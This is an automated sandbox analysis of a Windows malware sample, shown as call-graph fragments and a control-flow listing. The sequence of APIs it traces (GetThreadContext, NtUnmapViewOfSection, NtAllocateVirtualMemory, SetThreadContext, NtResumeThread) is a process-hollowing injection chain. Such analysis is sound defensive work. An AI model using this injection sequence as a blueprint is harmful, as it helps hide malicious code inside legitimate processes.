37333->37334 37335 2b14500 11 API calls 37334->37335 37336 2b2f2ba 37335->37336 37337 2b144dc 11 API calls 37336->37337 37338 2b2f2c2 37337->37338 37338->36520 37340 2b2f0b9 37339->37340 37341 2b2f0e5 37340->37341 37814 2b146c4 11 API calls 37340->37814 37815 2b14530 11 API calls 37340->37815 37342 2b144dc 11 API calls 37341->37342 37344 2b2f0fa 37342->37344 37344->36778 37816 2b149a0 37346->37816 37349 2b17e71 37349->36842 37349->36845 37351 2b14bcc 11 API calls 37350->37351 37353 2b2e370 37351->37353 37352 2b2e391 37352->36941 37353->37352 37354 2b149f8 11 API calls 37353->37354 37354->37353 37356 2b2dca2 37355->37356 37818 2b14f20 37356->37818 37358 2b2dcaa 37359 2b2dcca RtlDosPathNameToNtPathName_U 37358->37359 37822 2b2dbdc 37359->37822 37361 2b2dce6 NtCreateFile 37362 2b2dd11 37361->37362 37363 2b149f8 11 API calls 37362->37363 37364 2b2dd23 NtWriteFile NtClose 37363->37364 37365 2b2dd4d 37364->37365 37823 2b14c60 37365->37823 37368 2b144dc 11 API calls 37369 2b2dd5d 37368->37369 37369->36842 37371 2b149ac 37370->37371 37372 2b149e7 37371->37372 37373 2b145a0 11 API calls 37371->37373 37376 2b28d70 37372->37376 37374 2b149c3 37373->37374 37374->37372 37375 2b12c2c 11 API calls 37374->37375 37375->37372 37377 2b28d78 37376->37377 37378 2b14860 11 API calls 37377->37378 37379 2b28dbb 37378->37379 37380 2b147ec 11 API calls 37379->37380 37381 2b28de0 37380->37381 37382 2b289d0 20 API calls 37381->37382 37383 2b28dfb 37382->37383 37384 2b14860 11 API calls 37383->37384 37385 2b28e14 37384->37385 37386 2b147ec 11 API calls 37385->37386 37387 2b28e39 37386->37387 37388 2b289d0 20 API calls 37387->37388 37389 2b28e54 37388->37389 37390 2b2a8b7 37389->37390 37391 2b14860 11 API calls 37389->37391 37392 2b14500 11 API calls 37390->37392 37396 2b28e85 37391->37396 37393 2b2a8d4 37392->37393 37394 2b14500 11 API calls 37393->37394 37395 2b2a8e4 37394->37395 37397 2b14c60 SysFreeString 37395->37397 37399 2b147ec 11 API calls 37396->37399 37398 2b2a8ef 37397->37398 37400 2b14500 11 API calls 37398->37400 37403 2b28eaa 37399->37403 37401 2b2a8ff 37400->37401 37402 2b144dc 11 API calls 37401->37402 37404 2b2a907 37402->37404 37406 2b289d0 20 API calls 37403->37406 37405 2b14500 11 API calls 37404->37405 37407 2b2a914 37405->37407 37408 2b28ec5 37406->37408 37409 2b14500 11 API calls 37407->37409 37411 2b14860 11 API calls 37408->37411 37410 2b2a921 37409->37410 37410->36688 37412 2b28ede 37411->37412 37413 2b147ec 11 API calls 37412->37413 37414 2b28f03 37413->37414 37415 2b289d0 20 API calls 37414->37415 37416 2b28f1e 37415->37416 37416->37390 37417 2b14860 11 API calls 37416->37417 37418 2b28f66 37417->37418 37419 2b147ec 11 API calls 37418->37419 37420 2b28f8b 37419->37420 37421 2b289d0 20 API calls 37420->37421 37422 2b28fa6 37421->37422 37423 2b14860 11 API calls 37422->37423 37424 2b28fbf 37423->37424 37425 2b147ec 11 API calls 37424->37425 37426 2b28fe4 37425->37426 37427 2b289d0 20 API calls 37426->37427 37428 2b28fff 37427->37428 37429 2b14860 11 API calls 37428->37429 37430 2b29044 37429->37430 37431 2b147ec 11 API calls 37430->37431 37432 2b29069 37431->37432 37433 2b289d0 20 API calls 37432->37433 37434 2b29084 37433->37434 37435 2b14860 11 API calls 37434->37435 37436 2b2909d 37435->37436 37437 2b147ec 11 API calls 37436->37437 37438 2b290c5 37437->37438 37439 2b289d0 20 API calls 37438->37439 37440 2b290e3 37439->37440 37441 2b14860 11 API calls 37440->37441 37442 2b290ff 37441->37442 37443 2b147ec 11 API calls 37442->37443 37444 2b29130 37443->37444 37445 2b289d0 20 API calls 37444->37445 37446 2b29154 37445->37446 37447 2b14860 11 API calls 37446->37447 37448 2b29170 37447->37448 37449 2b147ec 11 API calls 37448->37449 37450 2b291a1 37449->37450 37451 2b289d0 20 API calls 37450->37451 37452 2b291c5 37451->37452 37453 2b14860 11 API calls 37452->37453 37454 2b291e1 37453->37454 37455 2b147ec 11 API calls 37454->37455 37456 2b29212 37455->37456 37457 2b289d0 20 API calls 37456->37457 37458 2b29236 37457->37458 37826 2b28788 37458->37826 37461 2b292e8 37462 2b14860 11 API calls 37461->37462 37464 2b29304 37462->37464 37463 2b14860 11 API calls 37465 2b29293 37463->37465 37466 2b147ec 11 API calls 37464->37466 37467 2b147ec 11 API calls 37465->37467 37468 2b29335 37466->37468 37469 2b292c4 37467->37469 37470 2b289d0 20 API calls 37468->37470 37471 2b289d0 20 API calls 37469->37471 37472 2b29359 37470->37472 37471->37461 37473 2b289d0 20 API calls 37472->37473 37474 2b2938c 37473->37474 37475 2b14860 11 API calls 37474->37475 37476 2b293a8 37475->37476 37477 2b147ec 11 API calls 37476->37477 37478 2b293d9 37477->37478 37479 2b289d0 20 API calls 37478->37479 37480 2b293fd 37479->37480 37481 2b14860 11 API calls 37480->37481 37482 2b29419 37481->37482 37483 2b147ec 11 API calls 37482->37483 37484 2b2944a 37483->37484 37485 2b289d0 20 API calls 37484->37485 37486 2b2946e 37485->37486 37487 2b12ee0 2 API calls 37486->37487 37488 2b29473 37487->37488 37489 2b14860 11 API calls 37488->37489 37490 2b294b6 37489->37490 37491 2b147ec 11 API calls 37490->37491 37492 2b294e7 37491->37492 37493 2b289d0 20 API calls 37492->37493 37494 2b2950b 37493->37494 37495 2b14860 11 API calls 37494->37495 37496 2b29527 37495->37496 37497 2b147ec 11 API calls 37496->37497 37498 2b29558 37497->37498 37499 2b289d0 20 API calls 37498->37499 37500 2b2957c 37499->37500 37501 2b14860 11 API calls 37500->37501 37502 2b29598 37501->37502 37503 2b147ec 11 API calls 37502->37503 37504 2b295c9 37503->37504 37505 2b289d0 20 API calls 37504->37505 37506 2b295ed GetThreadContext 37505->37506 37506->37390 37507 2b2960f 37506->37507 37508 2b14860 11 API calls 37507->37508 37509 2b2962b 37508->37509 37510 2b147ec 11 API calls 37509->37510 37511 2b2965c 37510->37511 37512 2b289d0 20 API calls 37511->37512 37513 2b29680 37512->37513 37514 2b14860 11 API calls 37513->37514 37515 2b2969c 37514->37515 37516 2b147ec 11 API calls 37515->37516 37517 2b296cd 37516->37517 37518 2b289d0 20 API calls 37517->37518 37519 2b296f1 37518->37519 37520 2b14860 11 API calls 37519->37520 37521 2b2970d 37520->37521 37522 2b147ec 11 API calls 37521->37522 37523 2b2973e 37522->37523 37524 2b289d0 20 API calls 37523->37524 37525 2b29762 37524->37525 37526 2b14860 11 API calls 37525->37526 37527 2b2977e 37526->37527 37528 2b147ec 11 API calls 37527->37528 37529 2b297af 37528->37529 37530 2b289d0 20 API calls 37529->37530 37531 2b297d3 37530->37531 37532 2b14860 11 API calls 37531->37532 37533 2b297ef 37532->37533 37534 2b147ec 11 API calls 37533->37534 37535 2b29820 37534->37535 37536 2b289d0 20 API calls 37535->37536 37537 2b29844 37536->37537 37838 2b28400 37537->37838 37540 2b29878 37543 2b14860 11 API calls 37540->37543 37541 2b29b7f 37542 2b14860 11 API calls 37541->37542 37544 2b29b9b 37542->37544 37545 2b29894 37543->37545 37546 2b147ec 11 API calls 37544->37546 37547 2b147ec 11 API calls 37545->37547 37549 2b29bcc 37546->37549 37548 2b298c5 37547->37548 37551 2b289d0 20 API calls 37548->37551 37550 2b289d0 20 API calls 37549->37550 37552 2b29b78 37550->37552 37553 2b298e9 37551->37553 37554 2b14860 11 API calls 37552->37554 37555 2b14860 11 API calls 37553->37555 37556 2b29c0c 37554->37556 37557 2b29905 37555->37557 37558 2b147ec 11 API calls 37556->37558 37559 2b147ec 11 API calls 37557->37559 37561 2b29c3d 37558->37561 37560 2b29936 37559->37560 37562 2b289d0 20 API calls 37560->37562 37563 2b289d0 20 API calls 37561->37563 37565 2b2995a 37562->37565 37564 2b29c61 37563->37564 37566 2b14860 11 API calls 37564->37566 37567 2b14860 11 API calls 37565->37567 37568 2b29c7d 37566->37568 37569 2b29976 37567->37569 37570 2b147ec 11 API calls 37568->37570 37571 2b147ec 11 API calls 37569->37571 37572 2b29cae 37570->37572 37573 2b299a7 37571->37573 37575 2b289d0 20 API calls 37572->37575 37574 2b289d0 20 API calls 37573->37574 37576 2b299cb 37574->37576 37577 2b29cd2 37575->37577 37852 2b28670 37576->37852 37579 2b14860 11 API calls 37577->37579 37585 2b29cee 37579->37585 37581 2b299e3 37583 2b27a2c 18 API calls 37581->37583 37582 2b29a0b 37584 2b14860 11 API calls 37582->37584 37586 2b29a04 37583->37586 37589 2b29a27 37584->37589 37587 2b147ec 11 API calls 37585->37587 37588 2b14860 11 API calls 37586->37588 37591 2b29d1f 37587->37591 37592 2b29a98 37588->37592 37590 2b147ec 11 API calls 37589->37590 37595 2b29a58 37590->37595 37593 2b289d0 20 API calls 37591->37593 37594 2b147ec 11 API calls 37592->37594 37596 2b29d43 37593->37596 37600 2b29ac9 37594->37600 37598 2b289d0 20 API calls 37595->37598 37597 2b27a2c 18 API calls 37596->37597 37599 2b29d64 37597->37599 37598->37586 37599->37390 37601 2b14860 11 API calls 37599->37601 37602 2b289d0 20 API calls 37600->37602 37605 2b29d92 37601->37605 37603 2b29aed 37602->37603 37604 2b14860 11 API calls 37603->37604 37607 2b29b09 37604->37607 37606 2b147ec 11 API calls 37605->37606 37609 2b29dc3 37606->37609 37608 2b147ec 11 API calls 37607->37608 37612 2b29b3a 37608->37612 37610 2b289d0 20 API calls 37609->37610 37611 2b29de7 37610->37611 37613 2b14860 11 API calls 37611->37613 37614 2b289d0 20 API calls 37612->37614 37617 2b29e03 37613->37617 37615 2b29b5e 37614->37615 37866 2b27a2c 37615->37866 37618 2b147ec 11 API calls 37617->37618 37619 2b29e34 37618->37619 37620 2b289d0 20 API calls 37619->37620 37621 2b29e58 37620->37621 37880 2b28c80 37621->37880 37623 2b14860 11 API calls 37625 2b29edf 37623->37625 37624 2b29e5f 37624->37623 37626 2b147ec 11 API calls 37625->37626 37627 2b29f10 37626->37627 37628 2b289d0 20 API calls 37627->37628 37629 2b29f34 37628->37629 37630 2b14860 11 API calls 37629->37630 37631 2b29f50 37630->37631 37632 2b147ec 11 API calls 37631->37632 37633 2b29f81 37632->37633 37634 2b289d0 20 API calls 37633->37634 37635 2b29fa5 37634->37635 37636 2b14860 11 API calls 37635->37636 37637 2b29fc1 37636->37637 37638 2b147ec 11 API calls 37637->37638 37639 2b29ff2 37638->37639 37640 2b289d0 20 API calls 37639->37640 37641 2b2a016 37640->37641 37642 2b27d78 18 API calls 37641->37642 37643 2b2a033 37642->37643 37644 2b14860 11 API calls 37643->37644 37645 2b2a04f 37644->37645 37646 2b147ec 11 API calls 37645->37646 37647 2b2a080 37646->37647 37648 2b289d0 20 API calls 37647->37648 37649 2b2a0a4 37648->37649 37650 2b14860 11 API calls 37649->37650 37651 2b2a0c0 37650->37651 37652 2b147ec 11 API calls 37651->37652 37653 2b2a0f1 37652->37653 37654 2b289d0 20 API calls 37653->37654 37655 2b2a115 37654->37655 37656 2b14860 11 API calls 37655->37656 37657 2b2a131 37656->37657 37658 2b147ec 11 API calls 37657->37658 37659 2b2a162 37658->37659 37660 2b289d0 20 API calls 37659->37660 37661 2b2a186 37660->37661 37662 2b27d78 18 API calls 37661->37662 37663 2b2a1a6 37662->37663 37664 2b14860 11 API calls 37663->37664 37665 2b2a1c2 37664->37665 37666 2b147ec 11 API calls 37665->37666 37667 2b2a1f3 37666->37667 37668 2b289d0 20 API calls 37667->37668 37669 2b2a217 37668->37669 37670 2b14860 11 API calls 37669->37670 37671 2b2a233 37670->37671 37672 2b147ec 11 API calls 37671->37672 37673 2b2a264 37672->37673 37674 2b289d0 20 API calls 37673->37674 37675 2b2a288 37674->37675 37676 2b14860 11 API calls 37675->37676 37677 2b2a2a4 37676->37677 37678 2b147ec 11 API calls 37677->37678 37679 2b2a2d5 37678->37679 37680 2b289d0 20 API calls 37679->37680 37681 2b2a2f9 SetThreadContext NtResumeThread 37680->37681 37682 2b14860 11 API calls 37681->37682 37683 2b2a345 37682->37683 37684 2b147ec 11 API calls 37683->37684 37685 2b2a376 37684->37685 37686 2b289d0 20 API calls 37685->37686 37687 2b2a39a 37686->37687 37688 2b14860 11 API calls 37687->37688 37689 2b2a3b6 37688->37689 37690 2b147ec 11 API calls 37689->37690 37691 2b2a3e7 37690->37691 37692 2b289d0 20 API calls 37691->37692 37693 2b2a40b 37692->37693 37694 2b14860 11 API calls 37693->37694 37695 2b2a427 37694->37695 37696 2b147ec 11 API calls 37695->37696 37697 2b2a458 37696->37697 37698 2b289d0 20 API calls 37697->37698 37699 2b2a47c 37698->37699 37700 2b14860 11 API calls 37699->37700 37701 2b2a498 37700->37701 37702 2b147ec 11 API calls 37701->37702 37703 2b2a4c9 37702->37703 37704 2b289d0 20 API calls 37703->37704 37705 2b2a4ed 37704->37705 37706 2b12c2c 11 API calls 37705->37706 37707 2b2a4fc 37706->37707 37708 2b14860 11 API calls 37707->37708 37709 2b2a51e 37708->37709 37710 2b147ec 11 API calls 37709->37710 37711 2b2a54f 37710->37711 37712 2b289d0 20 API calls 37711->37712 37713 2b2a573 37712->37713 37714 2b2894c 21 API calls 37713->37714 37715 2b2a587 37714->37715 37716 2b2894c 21 API calls 37715->37716 37717 2b2a59b 37716->37717 37718 2b2894c 21 API calls 37717->37718 37719 2b2a5af 37718->37719 37720 2b14860 11 API calls 37719->37720 37721 2b2a5cb 37720->37721 37722 2b147ec 11 API calls 37721->37722 37723 2b2a5fc 37722->37723 37724 2b289d0 20 API calls 37723->37724 37725 2b2a620 37724->37725 37726 2b2894c 21 API calls 37725->37726 37727 2b2a634 37726->37727 37728 2b2894c 21 API calls 37727->37728 37729 2b2a648 37728->37729 37730 2b14860 11 API calls 37729->37730 37731 2b2a664 37730->37731 37732 2b147ec 11 API calls 37731->37732 37733 2b2a682 37732->37733 37734 2b2894c 21 API calls 37733->37734 37735 2b2a69a 37734->37735 37736 2b14860 11 API calls 37735->37736 37737 2b2a6b6 37736->37737 37738 2b147ec 11 API calls 37737->37738 37739 2b2a6d4 37738->37739 37740 2b2894c 21 API calls 37739->37740 37741 2b2a6ec 37740->37741 37742 2b2894c 21 API calls 37741->37742 37743 2b2a700 37742->37743 37744 2b2894c 21 API calls 37743->37744 37745 2b2a714 37744->37745 37746 2b2894c 21 API calls 37745->37746 37747 2b2a728 37746->37747 37748 2b2894c 21 API calls 37747->37748 37749 2b2a73c 37748->37749 37750 2b14860 11 API calls 37749->37750 37751 2b2a758 37750->37751 37752 2b147ec 11 API calls 37751->37752 37753 2b2a776 37752->37753 37754 2b2894c 21 API calls 37753->37754 37755 2b2a78e 37754->37755 37756 2b14860 11 API calls 37755->37756 37757 2b2a7aa 37756->37757 37758 2b147ec 11 API calls 37757->37758 37759 2b2a7c8 37758->37759 37760 2b2894c 21 API calls 37759->37760 37761 2b2a7e0 37760->37761 37762 2b14860 11 API calls 37761->37762 37763 2b2a7fc 37762->37763 37764 2b147ec 11 API calls 37763->37764 37765 2b2a81a 37764->37765 37766 2b2894c 21 API calls 37765->37766 37767 2b2a832 37766->37767 37768 2b14860 11 API calls 37767->37768 37769 2b2a84e 37768->37769 37770 2b147ec 11 API calls 37769->37770 37771 2b2a86c 37770->37771 37772 2b2894c 21 API calls 37771->37772 37773 2b2a884 37772->37773 37774 2b2894c 21 API calls 37773->37774 37775 2b2a8a3 37774->37775 37776 2b2894c 21 API calls 37775->37776 37776->37390 37778 2b14530 11 API calls 37777->37778 37779 2b2835b 37778->37779 37780 2b14860 11 API calls 37779->37780 37781 2b2837a 37780->37781 37782 2b281cc 17 API calls 37781->37782 37783 2b2838d 37782->37783 37784 2b28274 15 API calls 37783->37784 37785 2b28393 FlushInstructionCache 37784->37785 37786 2b283b9 37785->37786 37787 2b144dc 11 API calls 37786->37787 37788 2b283c1 37787->37788 37788->37286 37790 2b14530 11 API calls 37789->37790 37791 2b285df 37790->37791 37792 2b14860 11 API calls 37791->37792 37793 2b285fe 37792->37793 37794 2b281cc 17 API calls 37793->37794 37795 2b28611 37794->37795 37796 2b28274 15 API calls 37795->37796 37797 2b28617 WinExec 37796->37797 37798 2b28639 37797->37798 37799 2b144dc 11 API calls 37798->37799 37800 2b28641 37799->37800 37800->36618 37801->36677 37802->36837 37803->36887 37804->37011 37805->36841 37806->36934 37808 2b28973 GetProcAddress 37807->37808 37809 2b289bb 37807->37809 37810 2b289b0 FreeLibrary 37808->37810 37811 2b2898d 37808->37811 37809->37134 37810->37809 37812 2b27d78 18 API calls 37811->37812 37813 2b289a5 37812->37813 37813->37810 37814->37340 37815->37340 37817 2b149a4 GetFileAttributesA 37816->37817 37817->37349 37819 2b14f26 SysAllocStringLen 37818->37819 37820 2b14f3c 37818->37820 37819->37820 37821 2b14c30 37819->37821 37820->37358 37821->37818 37822->37361 37824 2b14c74 37823->37824 37825 2b14c66 SysFreeString 37823->37825 37824->37368 37825->37824 37827 2b14530 11 API calls 37826->37827 37828 2b287ab 37827->37828 37829 2b14860 11 API calls 37828->37829 37830 2b287ca 37829->37830 37831 2b281cc 17 API calls 37830->37831 37832 2b287dd 37831->37832 37833 2b28274 15 API calls 37832->37833 37834 2b287e3 CreateProcessAsUserW 37833->37834 37835 2b28827 37834->37835 37836 2b144dc 11 API calls 37835->37836 37837 2b2882f 37836->37837 37837->37461 37837->37463 37839 2b14530 11 API calls 37838->37839 37840 2b28425 37839->37840 37841 2b2798c 12 API calls 37840->37841 37842 2b28432 37841->37842 37843 2b147ec 11 API calls 37842->37843 37844 2b2843f 37843->37844 37845 2b281cc 17 API calls 37844->37845 37846 2b28452 37845->37846 37847 2b28274 15 API calls 37846->37847 37848 2b28458 NtReadVirtualMemory 37847->37848 37849 2b28486 37848->37849 37850 2b14500 11 API calls 37849->37850 37851 2b28493 37850->37851 37851->37540 37851->37541 37853 2b14530 11 API calls 37852->37853 37854 2b28695 37853->37854 37855 2b2798c 12 API calls 37854->37855 37856 2b286a2 37855->37856 37857 2b147ec 11 API calls 37856->37857 37858 2b286af 37857->37858 37859 2b281cc 17 API calls 37858->37859 37860 2b286c2 37859->37860 37861 2b28274 15 API calls 37860->37861 37862 2b286c8 NtUnmapViewOfSection 37861->37862 37863 2b286e8 37862->37863 37864 2b14500 11 API calls 37863->37864 37865 2b286f5 37864->37865 37865->37581 37865->37582 37867 2b14530 11 API calls 37866->37867 37868 2b27a51 37867->37868 37869 2b2798c 12 API calls 37868->37869 37870 2b27a5e 37869->37870 37871 2b147ec 11 API calls 37870->37871 37872 2b27a6b 37871->37872 37873 2b281cc 17 API calls 37872->37873 37874 2b27a7e 37873->37874 37875 2b28274 15 API calls 37874->37875 37876 2b27a84 NtAllocateVirtualMemory 37875->37876 37877 2b27ab5 37876->37877 37878 2b14500 11 API calls 37877->37878 37879 2b27ac2 37878->37879 37879->37552 37881 2b12c10 11 API calls 37880->37881 37882 2b28cb6 37881->37882 37882->37624 37883 2b14edc 37884 2b14ee9 37883->37884 37888 2b14ef0 37883->37888 37889 2b14c38 37884->37889 37895 2b14c50 37888->37895 37890 2b14c4c 37889->37890 37891 2b14c3c SysAllocStringLen 37889->37891 37890->37888 37891->37890 37892 2b14c30 37891->37892 37893 2b14f26 SysAllocStringLen 37892->37893 37894 2b14f3c 37892->37894 37893->37892 37893->37894 37894->37888 37896 2b14c56 SysFreeString 37895->37896 37897 2b14c5c 37895->37897 37896->37897 37898 2b11c6c 37899 2b11d04 37898->37899 37900 2b11c7c 37898->37900 37901 2b11f58 37899->37901 37902 2b11d0d 37899->37902 37903 2b11cc0 37900->37903 37904 2b11c89 37900->37904 37908 2b11fec 37901->37908 37909 2b11f68 37901->37909 37910 2b11fac 37901->37910 37905 2b11d25 37902->37905 37920 2b11e24 37902->37920 37906 2b11724 10 API calls 37903->37906 37907 2b11c94 37904->37907 37946 2b11724 37904->37946 37912 2b11d2c 37905->37912 37916 2b11d48 37905->37916 37921 2b11dfc 37905->37921 37930 2b11cd7 37906->37930 37914 2b11724 10 API calls 37909->37914 37918 2b11fb2 37910->37918 37922 2b11724 10 API calls 37910->37922 37911 2b11e7c 37915 2b11724 10 API calls 37911->37915 37932 2b11e95 37911->37932 37931 2b11f82 37914->37931 37934 2b11f2c 37915->37934 37925 2b11d79 Sleep 37916->37925 37938 2b11d9c 37916->37938 37917 2b11cfd 37919 2b11cb9 37920->37911 37924 2b11e55 Sleep 37920->37924 37920->37932 37926 2b11724 10 API calls 37921->37926 37937 2b11fc1 37922->37937 37923 2b11fa7 37924->37911 37927 2b11e6f Sleep 37924->37927 37928 2b11d91 Sleep 37925->37928 37925->37938 37941 2b11e05 37926->37941 37927->37920 37928->37916 37929 2b11ca1 37929->37919 37970 2b11a8c 37929->37970 37930->37917 37936 2b11a8c 8 API calls 37930->37936 37931->37923 37939 2b11a8c 8 API calls 37931->37939 37934->37932 37940 2b11a8c 8 API calls 37934->37940 37935 2b11e1d 37936->37917 37937->37923 37942 2b11a8c 8 API calls 37937->37942 37939->37923 37943 2b11f50 37940->37943 37941->37935 37944 2b11a8c 8 API calls 37941->37944 37945 2b11fe4 37942->37945 37944->37935 37947 2b11968 37946->37947 37958 2b1173c 37946->37958 37948 2b11a80 37947->37948 37949 2b11938 37947->37949 37950 2b11684 VirtualAlloc 37948->37950 37951 2b11a89 37948->37951 37952 2b11947 Sleep 37949->37952 37957 2b11986 37949->37957 37953 2b116bf 37950->37953 37954 2b116af 37950->37954 37951->37929 37952->37957 37959 2b1195d Sleep 37952->37959 37953->37929 37987 2b11644 37954->37987 37955 2b1174e 37956 2b1175d 37955->37956 37962 2b1182c 37955->37962 37964 2b1180a Sleep 37955->37964 37956->37929 37965 2b115cc VirtualAlloc 37957->37965 37967 2b119a4 37957->37967 37958->37955 37961 2b117cb Sleep 37958->37961 37959->37949 37961->37955 37963 2b117e4 Sleep 37961->37963 37969 2b11838 37962->37969 37993 2b115cc 37962->37993 37963->37958 37964->37962 37966 2b11820 Sleep 37964->37966 37965->37967 37966->37955 37967->37929 37969->37929 37971 2b11aa1 37970->37971 37972 2b11b6c 37970->37972 37974 2b11aa7 37971->37974 37975 2b11b13 Sleep 37971->37975 37973 2b116e8 37972->37973 37972->37974 37977 2b11c66 37973->37977 37980 2b11644 2 API calls 37973->37980 37976 2b11ab0 37974->37976 37979 2b11b4b Sleep 37974->37979 37984 2b11b81 37974->37984 37975->37974 37978 2b11b2d Sleep 37975->37978 37976->37919 37977->37919 37978->37971 37981 2b11b61 Sleep 37979->37981 37979->37984 37982 2b116f5 VirtualFree 37980->37982 37981->37974 37983 2b1170d 37982->37983 37983->37919 37985 2b11c00 VirtualFree 37984->37985 37986 2b11ba4 37984->37986 37985->37919 37986->37919 37988 2b11681 37987->37988 37989 2b1164d 37987->37989 37988->37953 37989->37988 37990 2b1164f Sleep 37989->37990 37991 2b11664 37990->37991 37991->37988 37992 2b11668 Sleep 37991->37992 37992->37989 37997 2b11560 37993->37997 37995 2b115d4 VirtualAlloc 37996 2b115eb 37995->37996 37996->37969 37998 2b11500 37997->37998 37998->37995 37999 2b3d2fc 38009 2b1656c 37999->38009 38003 2b3d32a 38014 2b3c35c timeSetEvent 38003->38014 38005 2b3d334 38006 2b3d342 GetMessageA 38005->38006 38007 2b3d352 38006->38007 38008 2b3d336 TranslateMessage DispatchMessageA 38006->38008 38008->38006 38010 2b16577 38009->38010 38015 2b14198 38010->38015 38013 2b142ac SysFreeString SysReAllocStringLen SysAllocStringLen 38013->38003 38014->38005 38016 2b141de 38015->38016 38017 2b14257 38016->38017 38018 2b143e8 38016->38018 38029 2b14130 38017->38029 38021 2b14419 38018->38021 38024 2b1442a 38018->38024 38035 2b1435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 38021->38035 38023 2b14423 38023->38024 38025 2b1446f FreeLibrary 38024->38025 38026 2b14493 38024->38026 38025->38024 38027 2b144a2 ExitProcess 38026->38027 38028 2b1449c 38026->38028 38028->38027 38030 2b14173 38029->38030 38031 2b14140 38029->38031 38030->38013 38031->38030 38034 2b115cc VirtualAlloc 38031->38034 38036 2b16350 38031->38036 38042 2b15868 38031->38042 38034->38031 38035->38023 38037 2b16361 38036->38037 38041 2b16392 38036->38041 38037->38041 38046 2b158b0 38037->38046 38041->38031 38043 2b15894 38042->38043 38044 2b15878 GetModuleFileNameA 38042->38044 38043->38031 38055 2b15acc GetModuleFileNameA RegOpenKeyExA 38044->38055 38047 2b158bf 38046->38047 38048 2b158d5 LoadStringA 38046->38048 38047->38048 38049 2b15868 30 API calls 38047->38049 38050 2b145cc 38048->38050 38049->38048 38051 2b145a0 11 API calls 38050->38051 38052 2b145dc 38051->38052 38053 2b144dc 11 API calls 38052->38053 38054 2b145f4 38053->38054 38054->38041 38056 2b15b4f 38055->38056 38057 2b15b0f RegOpenKeyExA 38055->38057 38073 2b15908 12 API calls 38056->38073 38057->38056 38058 2b15b2d RegOpenKeyExA 38057->38058 38058->38056 38060 2b15bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 38058->38060 38062 2b15cf2 38060->38062 38063 2b15c0f 38060->38063 38061 2b15b74 RegQueryValueExA 38064 2b15b94 RegQueryValueExA 38061->38064 38065 2b15bb2 RegCloseKey 38061->38065 38062->38043 38063->38062 38067 2b15c1f lstrlenA 38063->38067 38064->38065 38065->38043 38068 2b15c37 38067->38068 38068->38062 38069 2b15c84 38068->38069 38070 2b15c5c lstrcpynA LoadLibraryExA 38068->38070 38069->38062 38071 2b15c8e lstrcpynA LoadLibraryExA 38069->38071 38070->38069 38071->38062 38072 2b15cc0 lstrcpynA LoadLibraryExA 38071->38072 38072->38062 38073->38061

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 02B28D70 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 6027 2b28d70-2b28d73 6028 2b28d78-2b28d7d 6027->6028 6028->6028 6029 2b28d7f-2b28e66 call 2b14990 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6028->6029 6060 2b2a8b7-2b2a921 call 2b14500 * 2 call 2b14c60 call 2b14500 call 2b144dc call 2b14500 * 2 6029->6060 6061 2b28e6c-2b28f47 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6029->6061 6061->6060 6105 2b28f4d-2b29275 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b130d4 * 2 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14de0 call 2b14df0 call 2b28788 6061->6105 6214 2b29277-2b292e3 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6105->6214 6215 2b292e8-2b29609 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b12ee0 call 2b12f08 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 GetThreadContext 6105->6215 6214->6215 6215->6060 6323 2b2960f-2b29872 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b28400 6215->6323 6396 2b29878-2b299e1 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b28670 6323->6396 6397 2b29b7f-2b29beb call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 